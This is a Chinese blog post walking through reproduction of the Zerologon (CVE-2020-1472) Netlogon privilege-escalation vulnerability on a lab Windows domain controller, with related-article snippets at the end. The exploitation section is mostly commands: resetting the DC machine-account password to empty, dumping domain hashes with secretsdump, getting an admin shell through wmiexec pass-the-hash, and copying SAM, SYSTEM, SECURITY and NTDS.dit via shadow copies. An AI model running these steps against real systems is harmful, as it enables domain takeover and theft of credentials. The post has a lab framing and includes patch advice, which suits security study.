(环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞

已于 2022-12-02 15:34:15 修改
阅读量3.8k 收藏 6
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
于 2022-01-25 15:00:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/122683892
版权

 0x00 简介

        Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。
        Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(NTLAN Manager,问询/应答身份验证协议,telnet的一种验证身份方式)登录服务器协议,让计算机更新其域内的密码。其他机器与域控的Netlogon通讯使用RPC协议MS-NRPC(指定了Netlogon远程协议,基于域的网络上的用户和计算机进行身份验证)。
        Netlogon协议不会使用与其他RPC服务相同的身份验证方案,而是使用自定义的加密协议,让客户端(加入域的计算机)和服务器(域管理员)互相证明它们都知道共享的机密(客户端计算机的哈希值密码)。

0x01 漏洞概述

        CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。

        原理:Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空

0x02 影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

0x03 漏洞利用

环境搭建可参考https://blog.csdn.net/qq_40989258/article/details/114842511搭建Microsoft Exchange Server 2016,此文不表。

前提:安装好最新的Impacket环境 ,git到本地后执行

sudo pip3 install .

环境介绍:域控IP:192.168.0.129

DC_SYSTEM_VERSION :Microsoft Windows Server 2016 Datacenter
DC_NETBIOS_NAME :WIN-UNQPITL7FNS
DC_IP_ADDR :192.168.0.129
DC_DOMAIN  :EX.COM

1、使用EXP将域控所在机器账户的hash置换成空密码的hash

python3 cve-2020-1472-exploit.py DC-HOST-NAME DC-IP

 2、置空后,再次获取域内凭证信息

secretsdump.py ex.com/WIN-UNQPITL7FNS\$@192.168.0.129 -just-dc -no-pass

可以看到机器账户的密码hash已经变成了空

WIN-UNQPITL7FNS$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 3、使用wmiexec获取到DC 管理员权限的交互Shell

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:cffd529ebf8690967820375f7196178e ex.com/administrator@192.168.0.129

4、还原域控机器用户的hash

        ①在上面的攻击过程中,我们将机器的密码置为空,会导致域控脱域,原因是机器用户在AD中的密码(存储在ntds.dic)与本地注册表里面的不一致。还原域控机器账户的hash,只要将AD中的密码与注册表里面的密码保持一致即可。

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
Ntdsutil "activate instance ntds" Ifm "create full C:\ntdsutil" Quit quit
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

        ②使用reg save命令将注册表里的信息拿回本地,再通过secretdump提取出里面的hash:

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

        ③使用工具将原始计算机账户哈希还原,后面的hash可以用上图红框中任意一组

python3 reinstall_original_pw.py WIN-UNQPITL7FNS 192.168.0.129 daa8c396da5b3934be0b992f25edb577
python3 reinstall_original_pw.py WIN-UNQPITL7FNS 192.168.0.129 9c76b204cdd95ae814286ef87eaecab247beb41a763a6536a16de85246ddce3f1148e734d5a27f5fed354cc310e796c4a52b45c2c0f6d0a6ef090ab9c1ae3fc63884b563316e2cdc6503420403a3b340b4e9066afe5235420bc7f19caef1f3209604590832761c1e63f2e4f066e154a12173bf8ea11fead59f33e5cc4e5d190196044d8f18fd793a39e7ac9e2cdfdf9eb22130a7e6b9db85374d8a6eb044e09cbc904dd19cb3021ba56325f7ed6391a42924f795b7f494136da99042fae58d8992c3f18cd403e7cd5a672e2ae24ce44c1067eb36f8f685a73bc3c8e931fbc67e864158ed01aa8ed94dcd11fdd6d168ab

        ④查看WIN-UNQPITL7FNS$账户的hash,已成功还原,此时想要无密码dump hash,就会报错。

0x04 修复方式 

1、下载并安装漏洞官方补丁:Security Update Guide - Microsoft Security Response Center
及时进行Microsoft Windows版本更新并且保持Windows自动更新开启。

Referer:

1、CVE-2020-1472 NetLogon特权提升漏洞 - zw1sh - 博客园

2、https://github.com/risksense/zerologon

3、https://github.com/dirkjanm/CVE-2020-1472

4、https://github.com/SecureAuthCorp/impacket/tree/impacket_0_9_24

daxi0ng
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7095
0x01漏洞背景 NetLogon远程协议是一种在Windows 控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9169
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
探秘CVE-2020-1472:零日攻击与Netlogon安全修复工具
最新发布
gitblog_00080的博客
04-09 401
探秘CVE-2020-1472:零日攻击与Netlogon安全修复工具 项目地址:https://gitcode.com/dirkjanm/CVE-2020-1472 在网络安全,"CVE-2020-1472"是一个引人关注的漏洞,它影响了微软的Windows Server操作系统。由开发者Dirkjan Molijn创建的GitCode项目,提供了一个深入理解该漏洞并进行...
探索CVE-2020-1472:Zerologon漏洞修复与研究
gitblog_00084的博客
04-02 491
探索CVE-2020-1472:Zerologon漏洞修复与研究 项目地址:https://gitcode.com/mstxq17/cve-2020-1472 在网络安全,及时发现和应对漏洞是至关重要的。项目链接提供了一个专门针对CVE-2020-1472(也称为“Zerologon”)漏洞的研究与修复工具集合,帮助安全专家、开发人员以及IT管理员更好地理解并防御这一威胁。 项目简介 该项目由...
CVE-2020-1472 Netlogon权限提升漏洞分析
further_eye的博客
11-09 1092
漏洞主要是由于在使用Netlogon安全通道与控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录控设备,并进一步控制整个
认识一下netlogon服务
yangdonghhm的专栏
04-07 8374
转:http://www.cnblogs.com/jankie/archive/2010/09/21/1832617.html 在活动目录中比较重要的一个服务-"Netlogon"服务,此服务在DC和成员服务器上运行,为身份验证提供重要服务,如果此服务停止成员服务器将无法登陆到中,下面是关于Netlogon服务的一些介绍: 1. Netlogon服务为控制器注册所有的srv资源纪录。...
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补控制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的控制器,请如下
Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证
smellycat000的专栏
09-16 1359
聚焦源代码安全,网罗国内外最新资讯!漏洞简介CVE-2020-1472是一个windows控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的...
CVE-2020-1472(提权)
p01son的博客
08-02 657
CVE-2020-1472(提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472: NetLogon特权提升漏洞通告
荒野求生的博客
11-07 484
1. CVE-2020-1472简要分析 阅读量 102057| 分享到: https://www.anquanke.com/post/id/217475 发布时间:2020-09-16 14:30:51 漏洞简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(...
CVE-2020-1472 提权
网络安全。
09-16 6140
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
net logon服务无法启动
热门推荐
tiantian6036的专栏
01-30 2万+
1. 启动"注册表编辑器"(Regedt32.exe)。 2. 在以下注册表项下选择 DependOnService 值: HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Netlogon/ 3. 在编辑菜单上,单击多重字符串,在出现的"多重字符串编辑器"中的不同行上键入下面的内容: LanmanServer Lanman
netlogon服务问题
weixin_33863087的博客
05-06 730
控制器无法启动了。最严重的是netlogon服务损坏了无法启动,原来加入的CLIENT无法退出原来,电脑之间都不能无相访问了,防问时提示未启动网络登录服务。有很多电脑连netlogon服务都不见了。 打开注册表编辑器,将HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Netlogon/ 的DependOnS...
Netlogon漏洞复现
来到了学渣的博客
03-04 805
Netlogon这个漏洞很特别,只要是内网非环境下,能访问到控就能直接打。影响的windows版本也很广,从win08到win19。 Netlogon攻击的思路 poc探测→重置密码→空密码导出内hash→利用管hash登陆→取出3个save文件→取出MACHINE.ACC值→恢复密码 攻击路线如下: 挂上代理之后,通过信息收集获取内网主机1.1.1.20 通过端口扫描发现,该主机开放了88端口和53端口,一般控都会开启dns和88端口的krb协议,并且445端口中探测出来存在GOD
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值